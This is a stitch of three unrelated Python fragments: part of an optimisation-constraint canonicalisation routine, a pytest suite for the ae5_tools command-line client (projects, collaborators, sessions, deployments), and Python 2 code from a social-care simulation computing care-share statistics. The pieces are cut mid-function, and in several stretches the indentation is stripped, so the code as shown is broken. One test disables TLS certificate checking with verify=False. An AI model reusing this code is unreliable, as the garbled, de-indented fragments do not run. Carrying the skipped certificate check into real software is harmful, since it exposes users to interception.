                np.empty(0, dtype=int),    # ineq
                rhs,                       # val_eq
                np.empty(0),               # val_ineq
                np.empty(0),               # sign
                n)                         # fun_len
    if ctype not in ("greater", "less", "interval"):
        raise RuntimeError("Never be here.")
    # Normalize every bound form to an (lb, ub) pair.
    if ctype == "greater":
        lb = np.asarray(kind[1], dtype=float)
        ub = np.full_like(lb, np.inf, dtype=float)
    elif ctype == "less":
        ub = np.asarray(kind[1], dtype=float)
        lb = np.full_like(ub, -np.inf, dtype=float)
    else:  # "interval"
        lb = np.asarray(kind[1], dtype=float)
        ub = np.asarray(kind[2], dtype=float)
    n = len(lb)
    indices = np.arange(n, dtype=int)
    units = np.ones(n)
    lb_finite = ~np.isinf(lb)
    ub_finite = ~np.isinf(ub)
    # Components with equal, finite bounds are equality constraints.
    is_eq = (lb == ub) & lb_finite & ub_finite
    lower_rows = ~is_eq & lb_finite
    upper_rows = ~is_eq & ub_finite
    eq = indices[is_eq]
    val_eq = lb[is_eq]
    # Lower-bound inequalities first, then upper bounds; a component
    # with two finite bounds contributes one of each.
    ineq = np.hstack((indices[lower_rows], indices[upper_rows]))
    val_ineq = np.hstack((lb[lower_rows], ub[upper_rows]))
    sign = np.hstack((-units[lower_rows], units[upper_rows]))
    return eq, ineq, val_eq, val_ineq, sign, n
def _concatenate_canonical_constraints(constraints,
sparse_jacobian=None):
"""Concatenate sequence of CanonicalConstraint's."""
# Compute number of constraints
n_eq = 0
n_ineq = 0
for constr in constraints:
n_eq += constr.n_eq
n_ineq += constr.n_ineq
# Get n_vars
n_vars = 0
x0 = None
for constr in constraints:
if n_vars == 0:
n_vars = constr.n_vars
x0 = constr.x0
if n_vars != constr.n_vars:
raise RuntimeError("Unmatching constraint number of arguments.")
if not np.array_equal(x0, constr.x0):
raise RuntimeError("Unmatching initial point.")
# Concatenate constraints
def new_constr(x):
constr_list = [constr.constr(x) for constr in constraints]
return _concatenate_constr(constr_list)
constr0_list = [(constr.c_ineq0, constr.c_eq0) for constr in constraints]
c_ineq0, c_eq0 = _concatenate_constr(constr0_list)
# Use sparse if any of the matrices are sparse
use_sparse = np.any([constr.sparse_jacobian for constr in constraints])
if use_sparse:
def new_jac(x):
jac_list = [constr.jac(x) for constr in constraints]
return _concatenate_sparse_jac(jac_list)
jac0_list = [(constr.J_ineq0, constr.J_eq0) for constr in constraints]
J_ineq0, J_eq0 = _concatenate_sparse_jac(jac0_list)
else:
def new_jac(x):
jac_list = [constr.jac(x) for constr in constraints]
return _concatenate_dense_jac(jac_list)
jac0_list = [(constr.J_ineq0, constr.J_eq0) for constr in constraints]
J_ineq0, J_eq0 = _concatenate_dense_jac(jac0_list)
# Concatenate Hessians
def new_hess(x, v_eq=np.empty(0), v_ineq=np.empty(0)):
hess_list = []
| |
# tests/test_cli.py
import pytest
import tempfile
import time
import os
import pytest
import pprint
import requests
import tarfile
import glob
import uuid
from datetime import datetime
from collections import namedtuple
from ae5_tools.api import AEUnexpectedResponseError
from .utils import _cmd, _compare_tarfiles, CMDException
@pytest.fixture(scope='module')
def project_list(user_session):
    # Module-scoped snapshot of all projects (with collaborator info);
    # ``user_session`` is only needed to ensure an active login.
    return _cmd('project list --collaborators')
def test_project_info(project_list):
    """Every project resolves identically by id, owner/name, and owner/name/id."""
    for expected in project_list:
        ident = expected['id']
        spec = '{}/{}'.format(expected['owner'], expected['name'])
        by_id = _cmd(f'project info {ident}')
        by_spec = _cmd(f'project info {spec}')
        by_both = _cmd(f'project info {spec}/{ident}')
        assert all(expected[k] == v for k, v in by_spec.items()), pprint.pformat((expected, by_spec))
        assert all(by_id[k] == v for k, v in by_spec.items()), pprint.pformat((by_id, by_spec))
        assert by_spec == by_both
def test_project_info_errors(project_list):
    """Ambiguous and unknown project specs fail with clear messages."""
    with pytest.raises(CMDException) as exc:
        _cmd('project info testproj1')
    assert 'Multiple projects' in str(exc.value)
    with pytest.raises(CMDException) as exc:
        _cmd('project info testproj4')
    assert 'No projects' in str(exc.value)
@pytest.fixture(scope='module')
def resource_profiles(user_session):
    # Module-scoped list of resource profiles visible to the session.
    return _cmd('resource-profile list')
def test_resource_profiles(resource_profiles):
    """Each profile is retrievable by name; bad specs raise clear errors."""
    for profile in resource_profiles:
        assert profile == _cmd(f'resource-profile info {profile["name"]}')
    with pytest.raises(CMDException) as exc:
        _cmd('resource-profile info *')
    assert 'Multiple resource profiles found' in str(exc.value)
    with pytest.raises(CMDException) as exc:
        _cmd('resource-profile info abcdefg')
    assert 'No resource profiles found' in str(exc.value)
@pytest.fixture(scope='module')
def editors(user_session):
    # Module-scoped list of available editors.
    return _cmd('editor list')
def test_editors(editors):
    """Editor info matches the list; exactly one default; core editors present."""
    for editor in editors:
        assert editor == _cmd(f'editor info {editor["id"]}')
    defaults = [e for e in editors if e['is_default'].lower() == 'true']
    assert len(defaults) == 1
    editor_ids = {e['id'] for e in editors}
    assert editor_ids.issuperset({'zeppelin', 'jupyterlab', 'notebook'})
def test_endpoints():
    """Every listed endpoint is retrievable by id with identical fields."""
    for endpoint in _cmd('endpoint list'):
        assert endpoint == _cmd(f'endpoint info {endpoint["id"]}')
def test_samples():
    """Exactly one default sample, several templates; info matches the list."""
    samples = _cmd('sample list')
    assert sum(s['is_default'].lower() == 'true' for s in samples) == 1
    assert sum(s['is_template'].lower() == 'true' for s in samples) > 1
    for sample in samples:
        by_id = _cmd(f'sample info "{sample["id"]}"')
        by_name = _cmd(f'sample info "{sample["name"]}"')
        assert sample == by_id and sample == by_name
def test_sample_clone():
    """Cloning twice with the same name fails unless --make-unique is passed."""
    cname = 'NLP-API'
    pname = 'testclone'
    first_clone = _cmd(f'sample clone {cname} --name {pname}')
    # A duplicate name must be rejected...
    with pytest.raises(CMDException):
        _cmd(f'sample clone {cname} --name {pname}')
    # ...unless uniquified, or left to the server to auto-name.
    unique_clone = _cmd(f'sample clone {cname} --name {pname} --make-unique')
    auto_clone = _cmd(f'sample clone {cname}')
    for rec in (first_clone, unique_clone, auto_clone):
        _cmd(f'project delete {rec["id"]}')
@pytest.fixture(scope='module')
def cli_project(project_list):
    # The shared 'testproj3' project used by the revision/download tests.
    return next(rec for rec in project_list if rec['name'] == 'testproj3')
@pytest.fixture(scope='module')
def cli_revisions(cli_project):
    # Pair the testproj3 record with its full revision list.
    prec = cli_project
    revs = _cmd(f'project revision list {prec["id"]}')
    return prec, revs
@pytest.fixture(scope='module')
def downloaded_project(user_session, cli_revisions):
    # Download testproj3 as a tarball, extract it, and yield both the
    # tarball filename and the extracted project directory.  Teardown
    # removes any projects the upload tests created from it.
    prec, revs = cli_revisions
    with tempfile.TemporaryDirectory() as tempd:
        fname = _cmd(f'project download {prec["id"]}', table=False).strip()
        assert fname == prec['name'] + '.tar.gz'
        with tarfile.open(fname, 'r') as tf:
            tf.extractall(path=tempd)
        # The extracted tree must contain exactly one project directory.
        dnames = glob.glob(os.path.join(tempd, '*', 'anaconda-project.yml'))
        assert len(dnames) == 1
        dname = os.path.dirname(dnames[0])
        yield fname, dname
        # Teardown: delete every project created by the upload tests and
        # verify none remain.
        for r in _cmd('project list'):
            if r['name'].startswith('test_upload'):
                _cmd(f'project delete {r["id"]}')
        assert not any(r['name'].startswith('test_upload')
                       for r in _cmd('project list'))
def test_project_download(downloaded_project):
    # The download itself is exercised (and asserted on) inside the fixture;
    # requesting the fixture is the whole test.
    pass
def test_project_upload(downloaded_project):
    # Upload the downloaded archive as a new project and verify the tagged
    # revision round-trips through download.
    fname, dname = downloaded_project
    _cmd(f'project upload {fname} --name test_upload1 --tag 1.2.3')
    rrec = _cmd(f'project revision list test_upload1')
    assert len(rrec) == 1
    rev = rrec[0]['name']
    fname2 = _cmd(f'project download test_upload1:{rev}', table=False).strip()
    # Downloading a specific revision embeds the revision in the filename.
    assert fname2 == f'test_upload1-{rev}.tar.gz'
    assert os.path.exists(fname2)
    # The re-downloaded archive must match the original content.
    _compare_tarfiles(fname, fname2)
    # AE 5.4.1 ignores --tag and assigns 0.0.1; treat that as a known failure.
    if rev == '0.0.1':
        pytest.xfail("5.4.1 revision issue")
    assert rev == '1.2.3'
def test_project_upload_as_directory(downloaded_project):
    """Upload an unpacked project directory and verify the tagged revision.

    Mirrors test_project_upload but passes the extracted directory instead of
    the tarball.
    """
    fname, dname = downloaded_project
    _cmd(f'project upload {dname} --name test_upload2 --tag 1.3.4')
    rrec = _cmd(f'project revision list test_upload2')
    assert len(rrec) == 1
    rev = rrec[0]['name']
    fname2 = _cmd(f'project download test_upload2:{rev}', table=False).strip()
    # Downloading a specific revision embeds the revision in the filename.
    assert fname2 == f'test_upload2-{rev}.tar.gz'
    assert os.path.exists(fname2)
    # AE 5.4.1 ignores --tag and assigns 0.0.1; treat that as a known failure.
    if rev == '0.0.1':
        pytest.xfail("5.4.1 revision issue")
    # BUG FIX: previously asserted '1.2.3' (copied from test_project_upload),
    # but this test uploads with --tag 1.3.4.
    assert rev == '1.3.4'
def test_project_revisions(cli_revisions):
    """'revision info' resolves a bare id, ':latest', and each explicit ':<rev>'."""
    prec, revs = cli_revisions
    pid = prec["id"]
    # With no revision spec, info returns the newest revision.
    assert _cmd(f'project revision info {pid}') == revs[0]
    # The explicit ':latest' spec behaves identically.
    assert _cmd(f'project revision info {pid}:latest') == revs[0]
    # Every revision can be fetched individually by id.
    for rev in revs:
        assert _cmd(f'project revision info {pid}:{rev["id"]}') == rev
def test_project_revision_errors(cli_revisions):
    """Ambiguous or unmatched project/revision specs raise descriptive errors."""
    prec, revs = cli_revisions
    # (command, expected error fragment) pairs, checked in order.
    cases = [
        ('project revision info testproj1', 'Multiple projects'),
        ('project revision info testproj4', 'No projects'),
        (f'project revision info {prec["id"]}:0.*', 'Multiple revisions'),
        (f'project revision info {prec["id"]}:a.b.c', 'No revisions'),
    ]
    for command, message in cases:
        with pytest.raises(CMDException) as excinfo:
            _cmd(command)
        assert message in str(excinfo.value)
def test_project_patch(cli_project, editors, resource_profiles):
    """Patch the project's resource profile and editor, then restore the originals.

    For each patchable field, pick a value different from the current one,
    apply the patch, verify it took effect, then patch back and verify the
    restore so later tests see an unmodified project.
    """
    prec = cli_project
    old, new = {}, {}
    for what, wlist in (('resource-profile', (r['name'] for r in resource_profiles)),
                        ('editor', (e['id'] for e in editors))):
        old[what] = prec[what.replace('-', '_')]
        # BUG FIX: previously compared v != old (the dict), which is always
        # True for a string, so the chosen "new" value could equal the current
        # one and the patch became a no-op. Compare against this field's value.
        new[what] = next(v for v in wlist if v != old[what])
    prec2 = _cmd(f'project patch {prec["id"]} ' + ' '.join(f'--{k}={v}' for k, v in new.items()))
    assert {k: prec2[k.replace('-', '_')] for k in new} == new
    # Restore the original settings.
    prec3 = _cmd(f'project patch {prec["id"]} ' + ' '.join(f'--{k}={v}' for k, v in old.items()))
    assert {k: prec3[k.replace('-', '_')] for k in old} == old
def test_project_collaborators(cli_project, project_list):
    # Exercise the collaborator lifecycle: add a user read/write, add the
    # 'everyone' group read-only, downgrade the user to read-only, remove both.
    prec = cli_project
    # Pick any user other than the project owner to act as the collaborator.
    uname = next(rec['owner'] for rec in project_list if rec['owner'] != prec['owner'])
    id = prec['id']
    # No collaborators exist yet, so 'info' must fail.
    with pytest.raises(CMDException) as excinfo:
        _cmd(f'project collaborator info {id} {uname}')
    assert f'No collaborators found matching id={uname}' in str(excinfo.value)
    clist = _cmd(f'project collaborator add {id} {uname}')
    assert len(clist) == 1
    clist = _cmd(f'project collaborator add {id} everyone --group --read-only')
    assert len(clist) == 2
    # The user has read/write; the 'everyone' group is read-only.
    assert all(c['id'] == uname and c['permission'] == 'rw' and c['type'] == 'user' or
               c['id'] == 'everyone' and c['permission'] == 'r' and c['type'] == 'group'
               for c in clist)
    # Re-adding the same user with --read-only downgrades the permission in place.
    clist = _cmd(f'project collaborator add {id} {uname} --read-only')
    assert len(clist) == 2
    assert all(c['id'] == uname and c['permission'] == 'r' and c['type'] == 'user' or
               c['id'] == 'everyone' and c['permission'] == 'r' and c['type'] == 'group'
               for c in clist)
    clist = _cmd(f'project collaborator remove {id} {uname} everyone')
    assert len(clist) == 0
    # Removing an already-removed collaborator must fail.
    with pytest.raises(CMDException) as excinfo:
        clist = _cmd(f'project collaborator remove {id} {uname}')
    assert f'Collaborator(s) not found: {uname}' in str(excinfo.value)
def test_project_activity(cli_project):
    """Activity listing honors --latest and --limit and rejects invalid flag combos."""
    prec = cli_project
    pid = prec["id"]
    activity = _cmd(f'project activity {pid}')
    assert 1 <= len(activity) <= 10
    # --latest returns the single newest record, unwrapped.
    latest = _cmd(f'project activity --latest {pid}')
    assert latest == activity[0]
    # --limit 1 returns a one-element list holding the same record.
    limited = _cmd(f'project activity --limit 1 {pid}')
    assert limited[0] == activity[0]
    # Mutually exclusive option combinations must be rejected.
    for bad_flags in ('--latest --all', '--limit 2 --all', '--latest --limit 2'):
        with pytest.raises(CMDException):
            _cmd(f'project activity {bad_flags} {pid}')
@pytest.fixture(scope='module')
def cli_session(cli_project):
    # Start a session for the test project, restart it (which replaces the
    # session id), and yield the project record plus the restarted session.
    prec = cli_project
    srec = _cmd(f'session start {prec["owner"]}/{prec["name"]}')
    srec2 = _cmd(f'session restart {srec["id"]} --wait')
    # The pre-restart session id must no longer be listed.
    assert not any(r['id'] == srec['id'] for r in _cmd('session list'))
    yield prec, srec2
    # Teardown: stop the session and confirm it is gone.
    _cmd(f'session stop {srec2["id"]}')
    assert not any(r['id'] == srec2['id'] for r in _cmd('session list'))
def test_session(cli_session):
    # The running session belongs to the right owner/project and serves Jupyter.
    prec, srec = cli_session
    assert srec['owner'] == prec['owner'], srec
    assert srec['name'] == prec['name'], srec
    # Ensure that the session can be retrieved by its project ID as well
    srec2 = _cmd(f'session info {srec["owner"]}/*/{prec["id"]}')
    assert srec2['id'] == srec['id']
    # The endpoint slug is the final hyphen-separated token of the session id.
    endpoint = srec['id'].rsplit("-", 1)[-1]
    sdata = _cmd(f'call / --endpoint={endpoint}', table=False)
    assert 'Jupyter Notebook requires JavaScript.' in sdata, sdata
def test_project_sessions(cli_session):
    """The project reports exactly the one session started by the fixture."""
    prec, srec = cli_session
    sessions = _cmd(f'project sessions {prec["id"]}')
    assert len(sessions) == 1
    assert sessions[0]['id'] == srec['id']
def test_session_branches(cli_session):
    """A fresh session exposes local, origin/local, and master branches, all in sync."""
    prec, srec = cli_session
    branches = _cmd(f'session branches {prec["id"]}')
    shas = {record['branch']: record['sha1'] for record in branches}
    assert set(shas) == {'local', 'origin/local', 'master'}, branches
    # No commits have been made yet, so local and master point at the same sha.
    assert shas['local'] == shas['master'], branches
def test_session_before_changes(cli_session):
    """Before any edits, the session reports no changes (vs HEAD or vs master).

    The auto-generated .projectignore is excluded, since the session creates
    it on startup.
    """
    prec, srec = cli_session
    changes1 = _cmd(f'session changes {prec["id"]}')
    changes1 = [c for c in changes1 if c['path'] != '.projectignore']
    assert changes1 == [], changes1
    changes2 = _cmd(f'session changes --master {prec["id"]}')
    # BUG FIX: previously filtered changes1 again, so the --master result was
    # never actually inspected and the second assert could not fail.
    changes2 = [c for c in changes2 if c['path'] != '.projectignore']
    assert changes2 == [], changes2
@pytest.fixture(scope='module')
def cli_deployment(cli_project):
    # Deploy the test project privately, restart the deployment (which replaces
    # its id), and yield the project record plus the restarted deployment.
    prec = cli_project
    dname = 'testdeploy'
    ename = 'testendpoint'
    drec = _cmd(f'project deploy {prec["owner"]}/{prec["name"]} --name {dname} --endpoint {ename} --command default --private')
    drec2 = _cmd(f'deployment restart {drec["id"]} --wait')
    # The pre-restart deployment id must no longer be listed.
    assert not any(r['id'] == drec['id'] for r in _cmd('deployment list'))
    yield prec, drec2
    # Teardown: stop the deployment and confirm it is gone.
    _cmd(f'deployment stop {drec2["id"]}')
    assert not any(r['id'] == drec2['id'] for r in _cmd('deployment list'))
def test_deploy(cli_deployment):
    # The deployment belongs to the right owner/project and serves its app.
    prec, drec = cli_deployment
    assert drec['owner'] == prec['owner'], drec
    assert drec['project_name'] == prec['name'], drec
    # The endpoint can take a moment to come up; retry with a growing backoff.
    for attempt in range(3):
        try:
            ldata = _cmd(f'call / --endpoint {drec["endpoint"]}', table=False)
            break
        except AEUnexpectedResponseError:
            time.sleep(attempt * 5)
            pass
    else:
        # for/else: reached only when all three attempts raised.
        raise RuntimeError("Could not get the endpoint to respond")
    assert ldata.strip() == 'Hello Anaconda Enterprise!', ldata
def test_project_deployments(cli_deployment):
    """The project reports exactly the one deployment created by the fixture."""
    prec, drec = cli_deployment
    deployments = _cmd(f'project deployments {prec["id"]}')
    assert len(deployments) == 1
    assert deployments[0]['id'] == drec['id']
def test_deploy_patch(cli_deployment):
    """Toggling the public/private flag twice returns the deployment to its start state."""
    prec, drec = cli_deployment

    def opposite_flag(record):
        # Pick whichever flag flips the deployment's current visibility.
        return '--private' if record['public'].lower() == 'true' else '--public'

    drec2 = _cmd(f'deployment patch {opposite_flag(drec)} {drec["id"]}')
    assert drec2['public'] != drec['public']
    drec3 = _cmd(f'deployment patch {opposite_flag(drec2)} {drec["id"]}')
    assert drec3['public'] == drec['public']
def test_deploy_token(user_session, cli_deployment):
prec, drec = cli_deployment
token = _cmd(f'deployment token {drec["id"]}', table=False).strip()
resp = requests.get(f'https://{drec["endpoint"]}.' + user_session.hostname,
headers={'Authorization': f'Bearer {token}'},
verify=False)
assert resp.status_code == 200
assert resp.text.strip() == 'Hello Anaconda Enterprise!', | |
= [x for x in class_5 if x.status == 'inactive']
totalCareDemand_5 = float(sum([x.hoursDemand for x in class_5]))
socialCareDemand_5 = float(sum([x.hoursDemand for x in inactivePeople_5]))
shareSocialCare_5 = 0
if totalCareDemand_5 > 0:
shareSocialCare_5 = socialCareDemand_5/totalCareDemand_5
# Graph 8
informalCareReceived = sum([x.informalCare for x in self.pop.livingPeople])
formalCareReceived = sum([x.formalCare for x in self.pop.livingPeople])
totalCareReceived = informalCareReceived + formalCareReceived
totalUnnmetCareNeed = sum([x.residualNeed for x in self.pop.livingPeople])
# Graph 5
perCapitaCareReceived = totalCareReceived/currentPop
perCapitaUnmetCareDemand = totalUnnmetCareNeed/currentPop
# Graph 12
informalSocialCareReceived = sum([x.informalCare for x in self.pop.livingPeople if x.informalCare > 0])
formalSocialCareReceived = sum([x.formalCare for x in self.pop.livingPeople if x.formalCare > 0])
socialCareReceived = informalSocialCareReceived + formalSocialCareReceived
unmetSocialCareNeed = sum([x.residualNeed for x in self.pop.livingPeople if x.residualNeed > 0])
if socialCareReceived != 0:
print 'Share of unmet social care: ' + str(unmetSocialCareNeed/socialCareReceived)
# Graph 6
perCapitaSocialCareReceived = socialCareReceived/currentPop
perCapitaUnmetSocialCareDemand = unmetSocialCareNeed/currentPop
# Graph 13
informalChildCareReceived = sum([x.informalCare for x in self.pop.livingPeople if x.status == 'child'])
formalChildCareReceived = sum([x.formalCare for x in self.pop.livingPeople if x.status == 'child'])
childCareReceived = informalChildCareReceived + formalChildCareReceived
unmetChildCareNeed = sum([x.residualNeed for x in self.pop.livingPeople if x.status == 'child'])
# Graph 7
perCapitaChildCareReceived = childCareReceived/currentPop
perCapitaUnmetChildCareDemand = unmetChildCareNeed/currentPop
# Graph 9:
shareInformalCareReceived = 0
if totalCareReceived > 0:
shareInformalCareReceived = informalCareReceived/totalCareReceived
informalSocialCareReceived_1 = sum([x.informalCare for x in class_1 if x.status == 'inactive'])
formalSocialCareReceived_1 = sum([x.formalCare for x in class_1 if x.status == 'inactive'])
socialCareReceived_1 = informalSocialCareReceived_1 + formalSocialCareReceived_1
informalChildCareReceived_1 = sum([x.informalCare for x in class_1 if x.status == 'child'])
formalChildCareReceived_1 = sum([x.formalCare for x in class_1 if x.status == 'child'])
childCareReceived_1 = informalChildCareReceived_1 + formalChildCareReceived_1
totalInformalCare_1 = informalChildCareReceived_1 + informalSocialCareReceived_1
totalFormalCare_1 = formalChildCareReceived_1 + formalSocialCareReceived_1
totalCare_1 = socialCareReceived_1 + childCareReceived_1
shareInformalCareReceived_1 = 0
if totalCare_1 > 0:
shareInformalCareReceived_1 = totalInformalCare_1/totalCare_1
informalSocialCareReceived_2 = sum([x.informalCare for x in class_2 if x.status == 'inactive'])
formalSocialCareReceived_2 = sum([x.formalCare for x in class_2 if x.status == 'inactive'])
socialCareReceived_2 = informalSocialCareReceived_2 + formalSocialCareReceived_2
informalChildCareReceived_2 = sum([x.informalCare for x in class_2 if x.status == 'child'])
formalChildCareReceived_2 = sum([x.formalCare for x in class_2 if x.status == 'child'])
childCareReceived_2 = informalChildCareReceived_2 + formalChildCareReceived_2
totalInformalCare_2 = informalChildCareReceived_2 + informalSocialCareReceived_2
totalFormalCare_2 = formalChildCareReceived_2 + formalSocialCareReceived_2
totalCare_2 = socialCareReceived_2 + childCareReceived_2
shareInformalCareReceived_2 = 0
if totalCare_2 > 0:
shareInformalCareReceived_2 = totalInformalCare_2/totalCare_2
informalSocialCareReceived_3 = sum([x.informalCare for x in class_3 if x.status == 'inactive'])
formalSocialCareReceived_3 = sum([x.formalCare for x in class_3 if x.status == 'inactive'])
socialCareReceived_3 = informalSocialCareReceived_3 + formalSocialCareReceived_3
informalChildCareReceived_3 = sum([x.informalCare for x in class_3 if x.status == 'child'])
formalChildCareReceived_3 = sum([x.formalCare for x in class_3 if x.status == 'child'])
childCareReceived_3 = informalChildCareReceived_3 + formalChildCareReceived_3
totalInformalCare_3 = informalChildCareReceived_3 + informalSocialCareReceived_3
totalFormalCare_3 = formalChildCareReceived_3 + formalSocialCareReceived_3
totalCare_3 = socialCareReceived_3 + childCareReceived_3
shareInformalCareReceived_3 = 0
if totalCare_3 > 0:
shareInformalCareReceived_3 = totalInformalCare_3/totalCare_3
informalSocialCareReceived_4 = sum([x.informalCare for x in class_4 if x.status == 'inactive'])
formalSocialCareReceived_4 = sum([x.formalCare for x in class_4 if x.status == 'inactive'])
socialCareReceived_4 = informalSocialCareReceived_4 + formalSocialCareReceived_4
informalChildCareReceived_4 = sum([x.informalCare for x in class_4 if x.status == 'child'])
formalChildCareReceived_4 = sum([x.formalCare for x in class_4 if x.status == 'child'])
childCareReceived_4 = informalChildCareReceived_4 + formalChildCareReceived_4
totalInformalCare_4 = informalChildCareReceived_4 + informalSocialCareReceived_4
totalFormalCare_4 = formalChildCareReceived_4 + formalSocialCareReceived_4
totalCare_4 = socialCareReceived_4 + childCareReceived_4
shareInformalCareReceived_4 = 0
if totalCare_4 > 0:
shareInformalCareReceived_4 = totalInformalCare_4/totalCare_4
informalSocialCareReceived_5 = sum([x.informalCare for x in class_5 if x.status == 'inactive'])
formalSocialCareReceived_5 = sum([x.formalCare for x in class_5 if x.status == 'inactive'])
socialCareReceived_5 = informalSocialCareReceived_5 + formalSocialCareReceived_5
informalChildCareReceived_5 = sum([x.informalCare for x in class_5 if x.status == 'child'])
formalChildCareReceived_5 = sum([x.formalCare for x in class_5 if x.status == 'child'])
childCareReceived_5 = informalChildCareReceived_5 + formalChildCareReceived_5
totalInformalCare_5 = informalChildCareReceived_5 + informalSocialCareReceived_5
totalFormalCare_5 = formalChildCareReceived_5 + formalSocialCareReceived_5
totalCare_5 = socialCareReceived_5 + childCareReceived_5
shareInformalCareReceived_5 = 0
if totalCare_5 > 0:
shareInformalCareReceived_5 = totalInformalCare_5/totalCare_5
# Graph 10:
shareInformalSocialCare = 0
if socialCareReceived > 0:
shareInformalSocialCare = informalSocialCareReceived/socialCareReceived
shareInformalSocialCare_1 = 0
if socialCareReceived_1 > 0:
shareInformalSocialCare_1 = informalSocialCareReceived_1/socialCareReceived_1
shareInformalSocialCare_2 = 0
if socialCareReceived_2 > 0:
shareInformalSocialCare_2 = informalSocialCareReceived_2/socialCareReceived_2
shareInformalSocialCare_3 = 0
if socialCareReceived_3 > 0:
shareInformalSocialCare_3 = informalSocialCareReceived_3/socialCareReceived_3
shareInformalSocialCare_4 = 0
if socialCareReceived_4 > 0:
shareInformalSocialCare_4 = informalSocialCareReceived_4/socialCareReceived_4
shareInformalSocialCare_5 = 0
if socialCareReceived_5 > 0:
shareInformalSocialCare_5 = informalSocialCareReceived_5/socialCareReceived_5
# Garph 11
shareInformalChildCare = 0
if childCareReceived > 0:
shareInformalChildCare = informalChildCareReceived/childCareReceived
shareInformalChildCare_1 = 0
if childCareReceived_1 > 0:
shareInformalChildCare_1 = informalChildCareReceived_1/childCareReceived_1
shareInformalChildCare_2 = 0
if childCareReceived_2 > 0:
shareInformalChildCare_2 = informalChildCareReceived_2/childCareReceived_2
shareInformalChildCare_3 = 0
if childCareReceived_3 > 0:
shareInformalChildCare_3 = informalChildCareReceived_3/childCareReceived_3
shareInformalChildCare_4 = 0
if childCareReceived_4 > 0:
shareInformalChildCare_4 = informalChildCareReceived_4/childCareReceived_4
shareInformalChildCare_5 = 0
if childCareReceived_5 > 0:
shareInformalChildCare_5 = informalChildCareReceived_5/childCareReceived_5
# Graph 14
shareUnmetCareDemand = 0
if totalCareNeed > 0:
shareUnmetCareDemand = totalUnnmetCareNeed/totalCareNeed
unmetCareNeed_1 = sum([x.residualNeed for x in class_1])
shareUnmetCareDemand_1 = 0
if totalCareDemand_1 > 0:
shareUnmetCareDemand_1 = unmetCareNeed_1/totalCareDemand_1
unmetCareNeed_2 = sum([x.residualNeed for x in class_2])
shareUnmetCareDemand_2 = 0
if totalCareDemand_2 > 0:
shareUnmetCareDemand_2 = unmetCareNeed_2/totalCareDemand_2
unmetCareNeed_3 = sum([x.residualNeed for x in class_3])
shareUnmetCareDemand_3 = 0
if totalCareDemand_3 > 0:
shareUnmetCareDemand_3 = unmetCareNeed_3/totalCareDemand_3
unmetCareNeed_4 = sum([x.residualNeed for x in class_4])
shareUnmetCareDemand_4 = 0
if totalCareDemand_4 > 0:
shareUnmetCareDemand_4 = unmetCareNeed_4/totalCareDemand_4
unmetCareNeed_5 = sum([x.residualNeed for x in class_5])
shareUnmetCareDemand_5 = 0
if totalCareDemand_5 > 0:
shareUnmetCareDemand_5 = unmetCareNeed_5/totalCareDemand_5
# Graph 15
totalSocialCareNeed = sum([x.hoursDemand for x in self.pop.livingPeople if x.status == 'inactive'])
shareUnmetSocialCareDemand = 0
if totalSocialCareNeed > 0:
shareUnmetSocialCareDemand = unmetSocialCareNeed/totalSocialCareNeed
unmetSocialCareNeed_1 = sum([x.residualNeed for x in class_1 if x.status == 'inactive'])
totalSocialCareNeed_1 = sum([x.hoursDemand for x in class_1 if x.status == 'inactive'])
shareUnmetSocialCareDemand_1 = 0
if totalSocialCareNeed_1 > 0:
shareUnmetSocialCareDemand_1 = unmetSocialCareNeed_1/totalSocialCareNeed_1
unmetSocialCareNeed_2 = sum([x.residualNeed for x in class_2 if x.status == 'inactive'])
totalSocialCareNeed_2 = sum([x.hoursDemand for x in class_2 if x.status == 'inactive'])
shareUnmetSocialCareDemand_2 = 0
if totalSocialCareNeed_2 > 0:
shareUnmetSocialCareDemand_2 = unmetSocialCareNeed_2/totalSocialCareNeed_2
unmetSocialCareNeed_3 = sum([x.residualNeed for x in class_3 if x.status == 'inactive'])
totalSocialCareNeed_3 = sum([x.hoursDemand for x in class_3 if x.status == 'inactive'])
shareUnmetSocialCareDemand_3 = 0
if totalSocialCareNeed_3 > 0:
shareUnmetSocialCareDemand_3 = unmetSocialCareNeed_3/totalSocialCareNeed_3
unmetSocialCareNeed_4 = sum([x.residualNeed for x in class_4 if x.status == 'inactive'])
totalSocialCareNeed_4 = sum([x.hoursDemand for x in class_4 if x.status == 'inactive'])
shareUnmetSocialCareDemand_4 = 0
if totalSocialCareNeed_4 > 0:
shareUnmetSocialCareDemand_4 = unmetSocialCareNeed_4/totalSocialCareNeed_4
unmetSocialCareNeed_5 = sum([x.residualNeed for x in class_5 if x.status == 'inactive'])
totalSocialCareNeed_5 = sum([x.hoursDemand for x in class_5 if x.status == 'inactive'])
shareUnmetSocialCareDemand_5 = 0
if totalSocialCareNeed_5 > 0:
shareUnmetSocialCareDemand_5 = unmetSocialCareNeed_5/totalSocialCareNeed_5
# Graph 16
totalChildCareNeed = sum([x.hoursDemand for x in self.pop.livingPeople if x.status == 'child'])
shareUnmetChildCareDemand = 0
if totalChildCareNeed > 0:
shareUnmetChildCareDemand = unmetChildCareNeed/totalChildCareNeed
unmetChildCareNeed_1 = sum([x.residualNeed for x in class_1 if x.status == 'child'])
totalChildCareNeed_1 = sum([x.hoursDemand for x in class_1 if x.status == 'child'])
shareUnmetChildCareDemand_1 = 0
if totalChildCareNeed_1 > 0:
shareUnmetChildCareDemand_1 = unmetChildCareNeed_1/totalChildCareNeed_1
unmetChildCareNeed_2 = sum([x.residualNeed for x in class_2 if x.status == 'child'])
totalChildCareNeed_2 = sum([x.hoursDemand for x in class_2 if x.status == 'child'])
shareUnmetChildCareDemand_2 = 0
if totalChildCareNeed_2 > 0:
shareUnmetChildCareDemand_2 = unmetChildCareNeed_2/totalChildCareNeed_2
unmetChildCareNeed_3 = sum([x.residualNeed for x in class_3 if x.status == 'child'])
totalChildCareNeed_3 = sum([x.hoursDemand for x in class_3 if x.status == 'child'])
shareUnmetChildCareDemand_3 = 0
if totalChildCareNeed_3 > 0:
shareUnmetChildCareDemand_3 = unmetChildCareNeed_3/totalChildCareNeed_3
unmetChildCareNeed_4 = sum([x.residualNeed for x in class_4 if x.status == 'child'])
totalChildCareNeed_4 = sum([x.hoursDemand for x in class_4 if x.status == 'child'])
shareUnmetChildCareDemand_4 = 0
if totalChildCareNeed_4 > 0:
shareUnmetChildCareDemand_4 = unmetChildCareNeed_4/totalChildCareNeed_4
unmetChildCareNeed_5 = sum([x.residualNeed for x in class_5 if x.status == 'child'])
totalChildCareNeed_5 = sum([x.hoursDemand for x in class_5 if x.status == 'child'])
shareUnmetChildCareDemand_5 = 0
if totalChildCareNeed_5 > 0:
